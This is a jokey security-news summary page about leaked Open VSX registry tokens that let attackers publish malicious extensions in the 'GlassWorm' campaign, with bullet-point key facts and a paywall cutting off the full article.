Open VSX Token Tango: Malicious Extensions Unleashed in Comedic Supply Chain Flop

The Open VSX registry had to rotate access tokens after developers accidentally leaked them, allowing threat actors to publish malicious extensions. This led to a campaign dubbed “GlassWorm,” which hid malware in invisible Unicode characters. Thankfully, the Open VSX team acted swiftly, containing the threat faster than a squirrel on espresso.

3P
Published: November 2, 2025 9:43 pmAdded: November 2, 2025 at 2:11 pmAssembled by: The Editor
Pro Dashboard

Hot Take:

It’s as if the Open VSX registry decided to pull an Oprah: “You get a token! You get a token! Everybody gets a token!” Unfortunately, this wasn’t a feel-good episode, but a supply chain drama with more plot twists than a daytime soap! Open VSX, you had one job: keep those tokens secret and safe, not turn them into party favors for hackers!

Key Points:

  • Open VSX tokens leaked, allowing threat actors to publish malicious extensions.
  • 550 secrets were exposed, leading to a significant supply-chain risk.
  • The GlassWorm campaign targeted developer credentials and cryptocurrency wallets.
  • The Open VSX registry has since contained the threat and rotated affected tokens.
  • Security measures are being enhanced to prevent future attacks.

Membership Required

 You must be a member to access this content.

View Membership Levels
Already a member? Log in here
The Nimble Nerd
powered by the NSA, er,  GDPR Cookie Compliance
Confessional Booth of Our Digital Sins

Okay, deep breath, let's get this over with. In the grand act of digital self-sabotage, we've littered this site with cookies. Yep, we did that. Why? So your highness can have a 'premium' experience or whatever. These traitorous cookies hide in your browser, eagerly waiting to welcome you back like a guilty dog that's just chewed your favorite shoe. And, if that's not enough, they also tattle on which parts of our sad little corner of the web you obsess over. Feels dirty, doesn't it?